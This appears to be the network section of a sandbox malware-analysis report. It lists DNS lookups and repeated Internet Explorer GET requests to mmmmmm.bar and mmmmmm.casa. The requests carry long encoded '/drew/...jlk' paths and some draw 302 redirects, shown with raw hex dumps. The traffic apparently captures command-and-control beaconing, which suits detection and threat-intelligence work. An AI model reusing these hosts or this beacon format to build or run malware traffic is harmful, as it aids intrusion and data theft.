                            Jan 12, 2022 11:13:10.185605049 CET8.8.8.8192.168.2.60x2a36No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.211249113 CET8.8.8.8192.168.2.60xd57dNo error (0)www.mmmmmm.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                            Jan 12, 2022 11:13:10.211249113 CET8.8.8.8192.168.2.60xd57dNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.211249113 CET8.8.8.8192.168.2.60xd57dNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.211249113 CET8.8.8.8192.168.2.60xd57dNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.211249113 CET8.8.8.8192.168.2.60xd57dNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.211249113 CET8.8.8.8192.168.2.60xd57dNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.211249113 CET8.8.8.8192.168.2.60xd57dNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.211249113 CET8.8.8.8192.168.2.60xd57dNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:30.573930025 CET8.8.8.8192.168.2.60xdf87No error (0)mmmmmm.bar31.41.45.66A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:30.609044075 CET8.8.8.8192.168.2.60x154fNo error (0)mmmmmm.bar31.41.45.66A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:30.660099983 CET8.8.8.8192.168.2.60x8fc7No error (0)mmmmmm.bar31.41.45.66A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:31.731359959 CET8.8.8.8192.168.2.60x9c2bNo error (0)mmmmmm.casa162.255.119.219A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:32.141119003 CET8.8.8.8192.168.2.60xbbeeNo error (0)www.mmmmmm.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                            Jan 12, 2022 11:13:32.141119003 CET8.8.8.8192.168.2.60xbbeeNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:32.141119003 CET8.8.8.8192.168.2.60xbbeeNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:32.141119003 CET8.8.8.8192.168.2.60xbbeeNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:32.141119003 CET8.8.8.8192.168.2.60xbbeeNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:32.141119003 CET8.8.8.8192.168.2.60xbbeeNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:32.141119003 CET8.8.8.8192.168.2.60xbbeeNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:32.141119003 CET8.8.8.8192.168.2.60xbbeeNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:52.592689037 CET8.8.8.8192.168.2.60x2c1cNo error (0)mmmmmm.bar31.41.45.66A (IP address)IN (0x0001)

                            HTTP Request Dependency Graph

                            • mmmmmm.bar
                            • mmmmmm.casa
                            • www.mmmmmm.casa

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.64976531.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:10:57.883001089 CET1200OUTGET /drew/_2FqRGYaq3iNgnfYUBd/UHuyRkDahjgLnMh3n18sF3/AB_2B8MfNm8lr/WF50_2FD/4gDnApI5ztDswQT6fjW65Rc/8MlMyqf40d/OYMqyhdyGd1vn8BC_/2FCmHGeoqK5H/6a3W2Hnh7_2/FTBT4tro82LZZK/jBx_2BoXi6bJAkOt7vlQn/kou7T2J7XWftNrQG/syM1ToxLg0h4e74/4f8O3ZiP0I7VXDSeQS/TpcGBDm3s/sgldq9ogVR_2FlxXdUQt/h.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            1192.168.2.64976631.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:10:59.589112997 CET1201OUTGET /drew/Wqqjeuz_2B3o/gTZon0hf6_2/BEGqKHLRv8jJbA/XiM_2F_2BLItgQ9_2FnkV/J37kJU5m548Ry5aD/_2BaeC5gue46teo/Mz94QcIObLwkCmIFSe/AYyEx_2Ft/7flnx_2FeBMaKdb_2BZY/2QcUQ0KczFWXmzcms2u/KqZ09beQmNbj50XJX6IPpt/L8avESS6Nbmyi/27IxeLE_/2B4eudEcqYK8iUY7pnK_2BN/lez_2F9d6B/JO7dBHKHEfmL4H2lk/EeykEsbEse/f.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            10192.168.2.649787198.54.117.21580C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:11:44.520802975 CET1306OUTGET /drew/mcyTA6nYo7I3Lz/Gg0KywBZ6ZMcybQpO6oFh/a_2Bz7Cxc8W0bVI_/2BZNTvU_2FIySan/m_2FNy1IRnoBB2dOL6/ewPhtQKmX/4vEptWmInKNSCCelbBJL/QsUTl3MG8W_2FUT5c4I/Wbyh4OWkqK5LNO5yhmAMAh/lEvQjX_2BglB2/ZgXdboWB/keU0AsD3UcwLpfPRqdjUowu/0EDp5luYWq/WPk0AaCP_2BNIdyuD/JX2Aa27OteSX/ayBPWZC0Qw7/E.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            11192.168.2.64978831.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:11:44.731028080 CET1308OUTGET /drew/PO9bW3Zv_2F/_2BA0kAKy74fTr/CqVufIf_2Fqxsh0iMOJ18/ApdxCWlx7O_2BNfd/RKvgigiK9hDa7_2/FbVDmbRn7bFA6hDIsg/qnhgHlt_2/Fn9gwy0xq3B1YpmIEOZM/i42uyk5dSn9gOG1Mrjl/gu0_2FGrgMcGgkRkxMvgEt/d2e52UUAd9X_2/FPiKiGt8/8igoSobBPUnwfzWxm1snqpo/33m84b1CoD/HFsz2OpMmuL6t_2Fc/dN61skszAki/D0m0Ko.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            12192.168.2.64979131.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:11:44.748245001 CET1309OUTGET /drew/EvNJYH1hit_2B/S_2FBSev/L6PRTXShrXbJ8nSbnHyL3kk/rxSkNCwe_2/FwMR5MuV_2Fgl3qPB/c6WKRAyG2mKK/EyMV4RPRN72/UBYRZyU7kLOVPK/eMDHC4ySlSv07nKtMx_2B/GdNtuquoq_2BZzhi/xfSg95Fx7okthXg/kTApiXXVCdgTGD_2Bz/_2Fp8iqr_/2BK8IeDoGoTnVf4v953h/YveRYe4a_2F0zB8eMbv/jnoXt_2BSI1PiRRfVToPJG/Eiyhp6P4/p.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            13192.168.2.64979231.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:11:44.765625000 CET1309OUTGET /drew/Htyh5S8h84hbP2LWKCnr_2B/LXaNEtu8OD/TOWxqpFfEELBfr4th/bCzBcRjTPZk7/6OgXjGc_2B_/2FAMgHsn7E9l6Q/B2WdGNnEZeMYZT3QqC9Nb/N3lrV5YafsC12ABW/3hwoiF9qB_2BZlH/icXT_2FOzkY5vJqst2/OVKX2yVdz/OWKBhlP93CQx3biHTKAg/kpFy9_2Fi1YHFZAcNn8/Dcq8SZvuWCYV0A8EYdfSFx/Y6Ue4WL_2FV7S/fsUD_2BIU/82.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            14192.168.2.64978931.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:11:44.797044039 CET1310OUTGET /drew/PO9bW3Zv_2F/_2BA0kAKy74fTr/CqVufIf_2Fqxsh0iMOJ18/ApdxCWlx7O_2BNfd/RKvgigiK9hDa7_2/FbVDmbRn7bFA6hDIsg/qnhgHlt_2/Fn9gwy0xq3B1YpmIEOZM/i42uyk5dSn9gOG1Mrjl/gu0_2FGrgMcGgkRkxMvgEt/d2e52UUAd9X_2/FPiKiGt8/8igoSobBPUnwfzWxm1snqpo/33m84b1CoD/HFsz2OpMmuL6t_2Fc/dN61skszAki/D0m0Ko.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            15192.168.2.64979331.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:11:44.826482058 CET1311OUTGET /drew/Htyh5S8h84hbP2LWKCnr_2B/LXaNEtu8OD/TOWxqpFfEELBfr4th/bCzBcRjTPZk7/6OgXjGc_2B_/2FAMgHsn7E9l6Q/B2WdGNnEZeMYZT3QqC9Nb/N3lrV5YafsC12ABW/3hwoiF9qB_2BZlH/icXT_2FOzkY5vJqst2/OVKX2yVdz/OWKBhlP93CQx3biHTKAg/kpFy9_2Fi1YHFZAcNn8/Dcq8SZvuWCYV0A8EYdfSFx/Y6Ue4WL_2FV7S/fsUD_2BIU/82.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            16192.168.2.64979531.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:11:44.924736023 CET1313OUTGET /drew/PO9bW3Zv_2F/_2BA0kAKy74fTr/CqVufIf_2Fqxsh0iMOJ18/ApdxCWlx7O_2BNfd/RKvgigiK9hDa7_2/FbVDmbRn7bFA6hDIsg/qnhgHlt_2/Fn9gwy0xq3B1YpmIEOZM/i42uyk5dSn9gOG1Mrjl/gu0_2FGrgMcGgkRkxMvgEt/d2e52UUAd9X_2/FPiKiGt8/8igoSobBPUnwfzWxm1snqpo/33m84b1CoD/HFsz2OpMmuL6t_2Fc/dN61skszAki/D0m0Ko.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            17192.168.2.64979731.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:11:44.953394890 CET1314OUTGET /drew/Htyh5S8h84hbP2LWKCnr_2B/LXaNEtu8OD/TOWxqpFfEELBfr4th/bCzBcRjTPZk7/6OgXjGc_2B_/2FAMgHsn7E9l6Q/B2WdGNnEZeMYZT3QqC9Nb/N3lrV5YafsC12ABW/3hwoiF9qB_2BZlH/icXT_2FOzkY5vJqst2/OVKX2yVdz/OWKBhlP93CQx3biHTKAg/kpFy9_2Fi1YHFZAcNn8/Dcq8SZvuWCYV0A8EYdfSFx/Y6Ue4WL_2FV7S/fsUD_2BIU/82.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            18192.168.2.64984531.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:13.048057079 CET12661OUTGET /drew/UW7u_2BFcze6Mn2V_/2F_2Ft6gfpjU/ji7Rx8VjY5w/9WflMmm_2Fmqb8/zBvQVjE0mqHlUZGMuEXTB/HEwR8WQpXxRM89oN/1cAqp1w8pPdeEz3/VIGd3IQjbLDnwpHP8K/7_2FeYyHT/464Qd9W8LhgOHL3Pj2aR/oq0Ng3p2PFGkfuSjaPw/_2BM_2BmxSzjLXgbDT3iEr/vDQWplVFAGepF/qn9lk8tr/bJ5cKP99gfc_2BeSGYfAwTs/d9FajJ_2F/2hdyIN.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            19192.168.2.649847162.255.119.21980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:14.734502077 CET12663OUTGET /drew/HtkON_2B7z6GBNJYyD4I3/xRuj4RA80G1xgwTe/6DMbifikIm_2FM8/00fCpSw_2FispEHnQv/ay_2F3gE3/oOYKJzhDJmDqsnndqRcm/WimAvUhteSw_2Fc93Cu/LsTVjCaCiit8lBp6cr3LHW/NUGnS2o0K1GIO/9DztPR6y/1wL4WK52CrQNl9GkBoK3y4y/0UMaajSHs_/2BFHmnnBnM3vSdJ5q/fZPNMnsQSSSV/F839oKXvjNu/zBM1z_2BEUjAtZ/n.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.casa
                            Connection: Keep-Alive
                            Jan 12, 2022 11:12:14.915195942 CET12665INHTTP/1.1 302 Found
                            Server: nginx
                            Date: Wed, 12 Jan 2022 10:12:14 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 320
                            Connection: keep-alive
                            Location: http://www.mmmmmm.casa/drew/HtkON_2B7z6GBNJYyD4I3/xRuj4RA80G1xgwTe/6DMbifikIm_2FM8/00fCpSw_2FispEHnQv/ay_2F3gE3/oOYKJzhDJmDqsnndqRcm/WimAvUhteSw_2Fc93Cu/LsTVjCaCiit8lBp6cr3LHW/NUGnS2o0K1GIO/9DztPR6y/1wL4WK52CrQNl9GkBoK3y4y/0UMaajSHs_/2BFHmnnBnM3vSdJ5q/fZPNMnsQSSSV/F839oKXvjNu/zBM1z_2BEUjAtZ/n.jlk
                            X-Served-By: Namecheap URL Forward
                            Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6d 6d 6d 6d 6d 2e 63 61 73 61 2f 64 72 65 77 2f 48 74 6b 4f 4e 5f 32 42 37 7a 36 47 42 4e 4a 59 79 44 34 49 33 2f 78 52 75 6a 34 52 41 38 30 47 31 78 67 77 54 65 2f 36 44 4d 62 69 66 69 6b 49 6d 5f 32 46 4d 38 2f 30 30 66 43 70 53 77 5f 32 46 69 73 70 45 48 6e 51 76 2f 61 79 5f 32 46 33 67 45 33 2f 6f 4f 59 4b 4a 7a 68 44 4a 6d 44 71 73 6e 6e 64 71 52 63 6d 2f 57 69 6d 41 76 55 68 74 65 53 77 5f 32 46 63 39 33 43 75 2f 4c 73 54 56 6a 43 61 43 69 69 74 38 6c 42 70 36 63 72 33 4c 48 57 2f 4e 55 47 6e 53 32 6f 30 4b 31 47 49 4f 2f 39 44 7a 74 50 52 36 79 2f 31 77 4c 34 57 4b 35 32 43 72 51 4e 6c 39 47 6b 42 6f 4b 33 79 34 79 2f 30 55 4d 61 61 6a 53 48 73 5f 2f 32 42 46 48 6d 6e 6e 42 6e 4d 33 76 53 64 4a 35 71 2f 66 5a 50 4e 4d 6e 73 51 53 53 53 56 2f 46 38 33 39 6f 4b 58 76 6a 4e 75 2f 7a 42 4d 31 7a 5f 32 42 45 55 6a 41 74 5a 2f 6e 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                            Data Ascii: <a href='http://www.mmmmmm.casa/drew/HtkON_2B7z6GBNJYyD4I3/xRuj4RA80G1xgwTe/6DMbifikIm_2FM8/00fCpSw_2FispEHnQv/ay_2F3gE3/oOYKJzhDJmDqsnndqRcm/WimAvUhteSw_2Fc93Cu/LsTVjCaCiit8lBp6cr3LHW/NUGnS2o0K1GIO/9DztPR6y/1wL4WK52CrQNl9GkBoK3y4y/0UMaajSHs_/2BFHmnnBnM3vSdJ5q/fZPNMnsQSSSV/F839oKXvjNu/zBM1z_2BEUjAtZ/n.jlk'>Found</a>.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            2192.168.2.64976931.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:10:59.592690945 CET1202OUTGET /drew/1QOwg_2FLZb/YxejGgbNFeCdhh/1gjuax4E3bxF4PQuVvUoz/mWe6jb2568sC8c53/IkV5WVtme_2FISC/QrKvSVSdIRQPViUnPj/3Fw_2FGBy/ougDsh_2BOgImgeL_2FQ/ksdlSb4g_2Fwrah6M24/q_2B2b3zRP7YanP8WhJAas/H3R9cX2XSL2XN/g1is_2Fx/5fxgjLlEiN4fVMRrNvIC_2B/BMY9igRITe/bCdqDPjTj_2BNJVhj/TVNqqBqkq6Cf/FXwLJI8.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            20192.168.2.649849162.255.119.21980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:14.802340984 CET12663OUTGET /drew/j7oozYYr4G/bYPRbLJriJS4feBdG/0xgI6EEeE0Qo/2gCtlKjoc_2/B1hFK5PzTlAsos/iTaAVzPWNav1dGzFBSySy/UxAr96PjZyJmtdFK/fjXwxJmbivWIGIY/yq5Vv8AYxEn49XkMGs/TubtjJpWE/75uowT9qAGrZ7hMQc0Ie/MC9oDaNtwMfoejZWEbQ/liHrTgwmRg6JEzsf_2FWS5/OEyBJ8_2Ft152/RzvfDI58/dRQYeFOH3wNaXYh/y.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.casa
                            Connection: Keep-Alive
                            Jan 12, 2022 11:12:15.039361954 CET12667INHTTP/1.1 302 Found
                            Server: nginx
                            Date: Wed, 12 Jan 2022 10:12:14 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 312
                            Connection: keep-alive
                            Location: http://www.mmmmmm.casa/drew/j7oozYYr4G/bYPRbLJriJS4feBdG/0xgI6EEeE0Qo/2gCtlKjoc_2/B1hFK5PzTlAsos/iTaAVzPWNav1dGzFBSySy/UxAr96PjZyJmtdFK/fjXwxJmbivWIGIY/yq5Vv8AYxEn49XkMGs/TubtjJpWE/75uowT9qAGrZ7hMQc0Ie/MC9oDaNtwMfoejZWEbQ/liHrTgwmRg6JEzsf_2FWS5/OEyBJ8_2Ft152/RzvfDI58/dRQYeFOH3wNaXYh/y.jlk
                            X-Served-By: Namecheap URL Forward
                            Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6d 6d 6d 6d 6d 2e 63 61 73 61 2f 64 72 65 77 2f 6a 37 6f 6f 7a 59 59 72 34 47 2f 62 59 50 52 62 4c 4a 72 69 4a 53 34 66 65 42 64 47 2f 30 78 67 49 36 45 45 65 45 30 51 6f 2f 32 67 43 74 6c 4b 6a 6f 63 5f 32 2f 42 31 68 46 4b 35 50 7a 54 6c 41 73 6f 73 2f 69 54 61 41 56 7a 50 57 4e 61 76 31 64 47 7a 46 42 53 79 53 79 2f 55 78 41 72 39 36 50 6a 5a 79 4a 6d 74 64 46 4b 2f 66 6a 58 77 78 4a 6d 62 69 76 57 49 47 49 59 2f 79 71 35 56 76 38 41 59 78 45 6e 34 39 58 6b 4d 47 73 2f 54 75 62 74 6a 4a 70 57 45 2f 37 35 75 6f 77 54 39 71 41 47 72 5a 37 68 4d 51 63 30 49 65 2f 4d 43 39 6f 44 61 4e 74 77 4d 66 6f 65 6a 5a 57 45 62 51 2f 6c 69 48 72 54 67 77 6d 52 67 36 4a 45 7a 73 66 5f 32 46 57 53 35 2f 4f 45 79 42 4a 38 5f 32 46 74 31 35 32 2f 52 7a 76 66 44 49 35 38 2f 64 52 51 59 65 46 4f 48 33 77 4e 61 58 59 68 2f 79 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                            Data Ascii: <a href='http://www.mmmmmm.casa/drew/j7oozYYr4G/bYPRbLJriJS4feBdG/0xgI6EEeE0Qo/2gCtlKjoc_2/B1hFK5PzTlAsos/iTaAVzPWNav1dGzFBSySy/UxAr96PjZyJmtdFK/fjXwxJmbivWIGIY/yq5Vv8AYxEn49XkMGs/TubtjJpWE/75uowT9qAGrZ7hMQc0Ie/MC9oDaNtwMfoejZWEbQ/liHrTgwmRg6JEzsf_2FWS5/OEyBJ8_2Ft152/RzvfDI58/dRQYeFOH3wNaXYh/y.jlk'>Found</a>.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            21192.168.2.649848162.255.119.21980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:14.809456110 CET12664OUTGET /drew/8VlHKrhhwaO4MOJ/f3EmmfXBW3D8HUpBCo/swchfzgV4/yHkfNEa_2Fwt2XYdacLI/ABkGMMt3HvRTK_2Bqqu/gzjGRx7KB_2F1RoftA_2Fz/PEgtk6sAU_2FI/SoLiX7_2/F6nF3_2FX_2FL_2BPA9VAJE/2ti_2BjF22/eWsy2b94EnkcAywCn/SePiZqRhG0KC/J9h54_2FXsX/_2BAYiFGvma0Ov/TOZ2z9V2mUHL5ZKiKLNfv/GDzWsuuy7dOH1Ahu/VU35hjTe/i6_2F.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.casa
                            Connection: Keep-Alive
                            Jan 12, 2022 11:12:15.039674997 CET12668INHTTP/1.1 302 Found
                            Server: nginx
                            Date: Wed, 12 Jan 2022 10:12:14 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 333
                            Connection: keep-alive
                            Location: http://www.mmmmmm.casa/drew/8VlHKrhhwaO4MOJ/f3EmmfXBW3D8HUpBCo/swchfzgV4/yHkfNEa_2Fwt2XYdacLI/ABkGMMt3HvRTK_2Bqqu/gzjGRx7KB_2F1RoftA_2Fz/PEgtk6sAU_2FI/SoLiX7_2/F6nF3_2FX_2FL_2BPA9VAJE/2ti_2BjF22/eWsy2b94EnkcAywCn/SePiZqRhG0KC/J9h54_2FXsX/_2BAYiFGvma0Ov/TOZ2z9V2mUHL5ZKiKLNfv/GDzWsuuy7dOH1Ahu/VU35hjTe/i6_2F.jlk
                            X-Served-By: Namecheap URL Forward
                            Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6d 6d 6d 6d 6d 2e 63 61 73 61 2f 64 72 65 77 2f 38 56 6c 48 4b 72 68 68 77 61 4f 34 4d 4f 4a 2f 66 33 45 6d 6d 66 58 42 57 33 44 38 48 55 70 42 43 6f 2f 73 77 63 68 66 7a 67 56 34 2f 79 48 6b 66 4e 45 61 5f 32 46 77 74 32 58 59 64 61 63 4c 49 2f 41 42 6b 47 4d 4d 74 33 48 76 52 54 4b 5f 32 42 71 71 75 2f 67 7a 6a 47 52 78 37 4b 42 5f 32 46 31 52 6f 66 74 41 5f 32 46 7a 2f 50 45 67 74 6b 36 73 41 55 5f 32 46 49 2f 53 6f 4c 69 58 37 5f 32 2f 46 36 6e 46 33 5f 32 46 58 5f 32 46 4c 5f 32 42 50 41 39 56 41 4a 45 2f 32 74 69 5f 32 42 6a 46 32 32 2f 65 57 73 79 32 62 39 34 45 6e 6b 63 41 79 77 43 6e 2f 53 65 50 69 5a 71 52 68 47 30 4b 43 2f 4a 39 68 35 34 5f 32 46 58 73 58 2f 5f 32 42 41 59 69 46 47 76 6d 61 30 4f 76 2f 54 4f 5a 32 7a 39 56 32 6d 55 48 4c 35 5a 4b 69 4b 4c 4e 66 76 2f 47 44 7a 57 73 75 75 79 37 64 4f 48 31 41 68 75 2f 56 55 33 35 68 6a 54 65 2f 69 36 5f 32 46 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                            Data Ascii: <a href='http://www.mmmmmm.casa/drew/8VlHKrhhwaO4MOJ/f3EmmfXBW3D8HUpBCo/swchfzgV4/yHkfNEa_2Fwt2XYdacLI/ABkGMMt3HvRTK_2Bqqu/gzjGRx7KB_2F1RoftA_2Fz/PEgtk6sAU_2FI/SoLiX7_2/F6nF3_2FX_2FL_2BPA9VAJE/2ti_2BjF22/eWsy2b94EnkcAywCn/SePiZqRhG0KC/J9h54_2FXsX/_2BAYiFGvma0Ov/TOZ2z9V2mUHL5ZKiKLNfv/GDzWsuuy7dOH1Ahu/VU35hjTe/i6_2F.jlk'>Found</a>.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            22192.168.2.649852198.54.117.21580C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:15.136485100 CET12669OUTGET /drew/HtkON_2B7z6GBNJYyD4I3/xRuj4RA80G1xgwTe/6DMbifikIm_2FM8/00fCpSw_2FispEHnQv/ay_2F3gE3/oOYKJzhDJmDqsnndqRcm/WimAvUhteSw_2Fc93Cu/LsTVjCaCiit8lBp6cr3LHW/NUGnS2o0K1GIO/9DztPR6y/1wL4WK52CrQNl9GkBoK3y4y/0UMaajSHs_/2BFHmnnBnM3vSdJ5q/fZPNMnsQSSSV/F839oKXvjNu/zBM1z_2BEUjAtZ/n.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
